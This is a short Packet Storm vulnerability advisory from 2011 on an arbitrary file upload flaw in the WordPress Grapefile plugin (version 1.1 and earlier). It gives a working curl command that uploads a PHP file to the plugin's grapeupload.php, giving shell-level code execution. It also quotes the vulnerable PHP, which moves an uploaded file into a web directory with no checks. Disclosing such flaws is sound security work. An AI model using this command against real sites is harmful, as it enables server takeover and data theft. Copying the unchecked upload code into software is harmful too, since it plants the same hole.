WordPress Grapefile 1.1 Shell Upload

2011-08-31T00:00:00
ID PACKETSTORM:104622
Type packetstorm
Reporter Hrvoje Spoljar
Modified 2011-08-31T00:00:00

Description

                                        
                                            `Title: Wordpress grapefile plugin <= 1.1 Arbitrary file upload  
Date: 30-8-2011  
Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]  
Version: 1.1  
Software link:http://wordpress.org/extend/plugins/grapefile/  
  
PoC:  
curl -F "userfile=@mycode.php"  
http://domain.tld/wp-content/plugins/grapefile/grapeupload.php  
  
File(s): grapeupload.php grapeupload2.php grapeupload3.php  
grapeupload4.php  
Vulnerable code:  
$uploaddir =  
$_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/';  
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);  
  
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {  
echo "success";  
  
`